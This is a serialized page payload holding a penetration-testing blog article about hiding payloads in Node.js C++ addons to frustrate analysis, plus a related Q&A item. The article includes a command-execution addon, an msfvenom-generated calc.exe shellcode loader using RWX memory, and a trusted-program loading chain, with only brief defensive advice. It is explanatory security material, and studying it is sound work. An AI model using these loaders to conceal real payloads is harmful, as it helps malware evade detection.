[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fg9D_MJaTfLxocX4pF4wf48GWfV4FwjxO8wQYtDFBzw8":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":33,"aiModel":30,"aiConfidence":30,"updatedAt":49,"createdAt":49,"_status":48},785,"What are the recommended defenses against attacks that use C++ addons in Node.js?","Defenses include monitoring the behavior of child processes spawned by trusted applications (e.g., `node.exe` from `t.exe`) and intercepting any suspicious actions such as code injection or unauthorized file writes. If anomalous behavior is detected, the certificate of the trusted program should be revoked. This approach complements broader security measures like those discussed in [Penetration Techniques - Using PHP Scripts to Obtain Net-NTLM Hash from Browsers](\u002Fnews\u002Fpenetration-techniques-using-php-scripts-to-obtain-net-ntlm-hash-from-browsers) that emphasize behavioral analysis.","\u003Cp>Defenses include monitoring the behavior of child processes spawned by trusted applications (e.g., `node.exe` from `t.exe`) and intercepting any suspicious actions such as code injection or unauthorized file writes. If anomalous behavior is detected, the certificate of the trusted program should be revoked. This approach complements broader security measures like those discussed in [Penetration Techniques - Using PHP Scripts to Obtain Net-NTLM Hash from Browsers](\u002Fnews\u002Fpenetration-techniques-using-php-scripts-to-obtain-net-ntlm-hash-from-browsers) that emphasize behavioral analysis.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fnode-js-in-penetration-testing-using-c-addons-to-conceal-actual-code\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-the-recommended-defenses-against-attacks-that-use-c-addons-in-nodejs-1777481884845","defense, child process monitoring, certificate revocation, behavioral interception",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":19,"readingTime":32,"status":33,"publishedAt":34,"seo":35,"tags":39,"qaPairs":40,"meta":45,"updatedAt":46,"createdAt":47,"_status":48},193,"Node.js in Penetration Testing: Using C++ Addons to Conceal Actual Code","node-js-in-penetration-testing-using-c-addons-to-conceal-actual-code","Learn how to use Node.js C++ addons to hide payloads in penetration testing, increasing analysis difficulty and leveraging C++ code.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article 'Node.js in Penetration Testing: Implementation of a Downloader', code for implementing a Downloader using Node.js was open-sourced, briefly analyzing its exploitation approach in penetration testing.\u003C\u002Fp>\u003Cp>Node.js syntax is simple and easy to understand, making Node.js code also relatively easy to analyze.\u003C\u002Fp>\u003Cp>To increase the difficulty of analyzing Node.js code, my idea is to utilize a feature of Node.js to encapsulate the payload in the form of a C++ addon.\u003C\u002Fp>\u003Cp>This not only increases the difficulty of analyzing the Node.js code but also allows the payload to be implemented in C++ code. Existing C++ code can be used with minor modifications, reducing the cost of secondary development.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to C++ Addons\u003C\u002Fli>\u003Cli>Setting up the Development Environment for C++ Addons\u003C\u002Fli>\u003Cli>Example of C++ Addon Code\u003C\u002Fli>\u003Cli>Exploitation Approach\u003C\u002Fli>\u003Cli>Defense Recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to C++ Addons\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Node.js C++ addons are dynamically linked libraries written in C++ that can be loaded into Node.js using the require() function. By utilizing the APIs provided by V8, they enable mutual calls between JavaScript and C++, bridging the interface between the two languages.\u003C\u002Fp>\u003Cp>Official Documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fnodejs.org\u002Fapi\u002Faddons.html\u003C\u002Fp>\u003Cp>Usage Example:\u003C\u002Fp>\u003Col>\u003Cli>After successfully compiling a C++ addon that exports a method named: hello\u003C\u002Fli>\u003Cli>The code to call the exported method from the C++ addon in Node.js is as follows:\u003C\u002Fli>\u003C\u002Fol>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>const addon = require('.\u002Faddon.node');\u003Cbr>addon.hello();\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Col>\u003Cli>Execute the code\u003C\u002Fli>\u003C\u002Fol>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>node.exe test.js\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x03 Setting Up the Development Environment for C++ Addons\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Windows Development Environment\u003C\u002Fh3>\u003Cp>Test system: Win7sp1 x64\u003C\u002Fp>\u003Cp>The following tools need to be installed:\u003C\u002Fp>\u003Cul>\u003Cli>.NET Framework 4.5.1 or higher\u003C\u002Fli>\u003Cli>Python 2.7\u003C\u002Fli>\u003Cli>Visual Studio 2015 or higher\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The specific setup process is as follows:\u003C\u002Fp>\u003Cp>1. Install .NET Framework 4.5.1\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.microsoft.com\u002Fen-US\u002Fdownload\u002Fdetails.aspx?id=5842\u003C\u002Fp>\u003Cp>2. Download Node.js\u003C\u002Fp>\u003Cp>https:\u002F\u002Fnodejs.org\u002Fen\u002Fdownload\u002F\u003C\u002Fp>\u003Cp>3. Use Windows-Build-Tools to automatically install dependency tools\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Ffelixrieseberg\u002Fwindows-build-tools\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cd c:\\\u003Cbr>powershell\u003Cbr>npm install --global windows-build-tools\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If installation fails, you can choose to manually install the following tools:\u003C\u002Fp>\u003Cul>\u003Cli>Python 2.7\u003C\u002Fli>\u003Cli>Visual Studio 2015 or later\u003C\u002Fli>\u003C\u002Ful>\u003Cp>4. Install node-gyp\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fnodejs\u002Fnode-gyp\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>npm install -g node-gyp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Linux development environment\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wget https:\u002F\u002Fnodejs.org\u002Fdist\u002Fv10.15.3\u002Fnode-v10.15.3-linux-x64.tar.xz\u003Cbr>tar xf node-v10.15.3-linux-x64.tar.xz\u003Cbr>cd node-v10.15.3-linux-x64\u003Cbr>cd bin\u003Cbr>export PATH=\u002Froot\u002Fnode-v10.15.3-linux-x64\u002Fbin:$PATH\u003Cbr>.\u002Fnpm install -g node-gyp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>You need to add an environment variable to specify the location of node (export PATH=\u002Froot\u002Fnode-v10.15.3-linux-x64\u002Fbin:$PATH), otherwise npm install will fail with the error: \u002Fusr\u002Fbin\u002Fenv: 'node': No such file or directory\u003C\u002Fp>\u003Cp>Example:\u003C\u002Fp>\u003Col>\u003Cli>hello.cc:\u003C\u002Fli>\u003C\u002Fol>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cnode.h>\u003Cbr>namespace demo {\u003Cbr>using v8::FunctionCallbackInfo;\u003Cbr>using v8::Isolate;\u003Cbr>using v8::Local;\u003Cbr>using v8::NewStringType;\u003Cbr>using v8::Object;\u003Cbr>using v8::String;\u003Cbr>using v8::Value;\u003Cbr>\u003Cbr>void Method(const FunctionCallbackInfo\u003Cvalue>&amp; args) {\u003Cbr>  Isolate* isolate = args.GetIsolate();\u003Cbr>  args.GetReturnValue().Set(String::NewFromUtf8(\u003Cbr>      isolate, \"world\", NewStringType::kNormal).ToLocalChecked());\u003Cbr>}\u003Cbr>\u003Cbr>void Initialize(Local\u003Cobject> exports) {\u003Cbr>  NODE_SET_METHOD(exports, \"hello\", Method);\u003Cbr>}\u003Cbr>\u003Cbr>NODE_MODULE(NODE_GYP_MODULE_NAME, Initialize)\u003Cbr>\u003Cbr>}  \u002F\u002F namespace demo\u003Cp>\u003C\u002Fp>\u003C\u002Fobject>\u003C\u002Fvalue>\u003C\u002Fnode.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Col>\u003Cli>binding.gyp\u003C\u002Fli>\u003C\u002Fol>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>{\u003Cbr>  \"targets\": [\u003Cbr>    {\u003Cbr>      \"target_name\": \"addon\",\u003Cbr>      \"sources\": [ \"hello.cc\" ]\u003Cbr>    }\u003Cbr>  ]\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Col>\u003Cli>Compile via node-gyp to generate plugins\u003C\u002Fli>\u003C\u002Fol>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>node-gyp configure\u003Cbr>node-gyp build\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Can be combined into a single command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>node-gyp configure build\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Node.js supports cross-compilation. For specific parameter details, refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.npmjs.com\u002Fpackage\u002Fnode-pre-gyp\u003C\u002Fp>\u003Cp>Command to generate plugins for Windows 64-bit system under Linux is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>node-gyp configure build --target_arch=x64 --target_platform=win32\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 C++ Plugin Code Example\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>During development, it's best to avoid conditional statements like if, as direct use may cause compilation errors\u003C\u002Fp>\u003Ch3>1. Release file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cnode.h>\u003Cbr>#include \u003Cstdio.h>\u003Cbr>namespace demo {\u003Cbr>\tusing v8::FunctionCallbackInfo;\u003Cbr>\tusing v8::Isolate;\u003Cbr>\tusing v8::Local;\u003Cbr>\tusing v8::Object;\u003Cbr>\tusing v8::String;\u003Cbr>\tusing v8::Value;\u003Cbr>\u003Cbr>\tvoid Method(const FunctionCallbackInfo\u003Cvalue>&amp; args) {\u003Cbr>\t\tFILE* fp;\u003Cbr>\t\tfopen_s(&amp;fp, \"new.txt\", \"ab+\");\u003Cbr>\t\tchar *buf = \"123456\";\u003Cbr>\t\tfwrite(buf, strlen(buf), 1, fp);\u003Cbr>\t\tfseek(fp, 0, SEEK_END);\u003Cbr>\t\tfclose(fp);\u003Cbr>\t}\u003Cbr>\u003Cbr>\tvoid init(Local\u003Cobject> exports) {\u003Cbr>\t\tNODE_SET_METHOD(exports, \"hello\", Method);\u003Cbr>\t}\u003Cbr>\tNODE_MODULE(NODE_GYP_MODULE_NAME, init)\u003Cbr>}\u003Cp>\u003C\u002Fp>\u003C\u002Fobject>\u003C\u002Fvalue>\u003C\u002Fstdio.h>\u003C\u002Fnode.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Execute command:\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cnode.h>\u003Cbr>namespace demo {\u003Cbr>\tusing v8::FunctionCallbackInfo;\u003Cbr>\tusing v8::Isolate;\u003Cbr>\tusing v8::Local;\u003Cbr>\tusing v8::Object;\u003Cbr>\tusing v8::String;\u003Cbr>\tusing v8::Value;\u003Cbr>\u003Cbr>\tvoid Method(const FunctionCallbackInfo\u003Cvalue>&amp; args) {\u003Cbr>\t\tsystem(\"powershell start calc.exe\");\u003Cbr>\t}\u003Cbr>\u003Cbr>\tvoid init(Local\u003Cobject> exports) {\u003Cbr>\t\tNODE_SET_METHOD(exports, \"hello\", Method);\u003Cbr>\t}\u003Cbr>\tNODE_MODULE(NODE_GYP_MODULE_NAME, init)\u003Cbr>}\u003Cp>\u003C\u002Fp>\u003C\u002Fobject>\u003C\u002Fvalue>\u003C\u002Fnode.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Execute shellcode\u003C\u002Fh3>\u003Cp>Generate shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fexec CMD=calc.exe -f c\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Load and execute shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cnode.h>\u003Cbr>#include \u003Cwindows.h>\u003Cbr>namespace demo {\u003Cbr>\tusing v8::FunctionCallbackInfo;\u003Cbr>\tusing v8::Isolate;\u003Cbr>\tusing v8::Local;\u003Cbr>\tusing v8::Object;\u003Cbr>\tusing v8::String;\u003Cbr>\tusing v8::Value;\u003Cbr>\u003Cbr>\tvoid Method(const FunctionCallbackInfo\u003Cvalue>&amp; args) {\u003Cbr>\t\tunsigned char shellcode[] = \"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\"\u003Cbr>\t\t\t\"\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\"\u003Cbr>\t\t\t\"\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\"\u003Cbr>\t\t\t\"\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\"\u003Cbr>\t\t\t\"\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\"\u003Cbr>\t\t\t\"\\x01\\xd0\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\"\u003Cbr>\t\t\t\"\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\"\u003Cbr>\t\t\t\"\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\"\u003Cbr>\t\t\t\"\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\"\u003Cbr>\t\t\t\"\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\"\u003Cbr>\t\t\t\"\\x66\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\"\u003Cbr>\t\t\t\"\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\"\u003Cbr>\t\t\t\"\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\"\u003Cbr>\t\t\t\"\\x8b\\x12\\xe9\\x57\\xff\\xff\\xff\\x5d\\x48\\xba\\x01\\x00\\x00\\x00\\x00\"\u003Cbr>\t\t\t\"\\x00\\x00\\x00\\x48\\x8d\\x8d\\x01\\x01\\x00\\x00\\x41\\xba\\x31\\x8b\\x6f\"\u003Cbr>\t\t\t\"\\x87\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x41\\xba\\xa6\\x95\\xbd\\x9d\\xff\"\u003Cbr>\t\t\t\"\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\"\u003Cbr>\t\t\t\"\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\\xd5\\x63\\x61\\x6c\"\u003Cbr>\t\t\t\"\\x63\\x2e\\x65\\x78\\x65\\x00\";\u003Cbr>\t\tvoid *sc = VirtualAlloc(0, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\u003Cbr>\t\tmemcpy(sc, shellcode, sizeof(shellcode));\u003Cbr>\t\t(*(int(*)()) sc)();\u003Cbr>\u003Cbr>\t}\u003Cbr>\u003Cbr>\tvoid init(Local\u003Cobject> exports) {\u003Cbr>\t\tNODE_SET_METHOD(exports, \"hello\", Method);\u003Cbr>\t}\u003Cbr>\tNODE_MODULE(NODE_GYP_MODULE_NAME, init)\u003Cbr>}\u003Cp>\u003C\u002Fp>\u003C\u002Fobject>\u003C\u002Fvalue>\u003C\u002Fwindows.h>\u003C\u002Fnode.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The compiled plugin has been uploaded to GitHub at the following address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The export method for the above plugin code is 'hello', and the invocation method is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>const addon = require('.\u002Faddon.node');\u003Cbr>addon.hello();\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x05 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Loaded by a third-party trusted program\u003C\u002Fp>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fbbs.pediy.com\u002Fthread-249573.htm\u003C\u002Fp>\u003Cp>t.exe-&gt;node.exe-&gt;main.js\u003C\u002Fp>\u003Cp>main.js and addon.node are placed in the same directory, the content of main.js is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>const addon = require('.\u002Faddon.node');\u003Cbr>addon.hello();\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>addon.node is in DLL format, making it impossible to directly obtain the payload, increasing the cost of static analysis\u003C\u002Fp>\u003Ch2>0x06 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Monitor the behavior of child processes (node.exe) of t.exe, and intercept if suspicious behavior is detected, revoking trust in the certificate\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the usage of C++ addons in Node.js, which can be used to increase the difficulty of analyzing Node.js code, and finally shares three payload writing methods.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",4,"published","2026-02-02T07:38:21.199Z",{"title":36,"description":14,"keywords":37,"ogImage":30,"canonicalUrl":30,"noIndex":38},"Node.js Penetration Testing: Conceal Code with C++ Addons","Node.js penetration testing, C++ addons, code concealment, security, exploit development",false,[],{"docs":41,"hasNextPage":38},[4,42,43,44],784,783,782,{"title":30,"description":30,"image":30},"2026-07-24T02:07:19.047Z","2026-07-23T16:02:05.286Z","draft","2026-07-23T16:14:44.892Z"]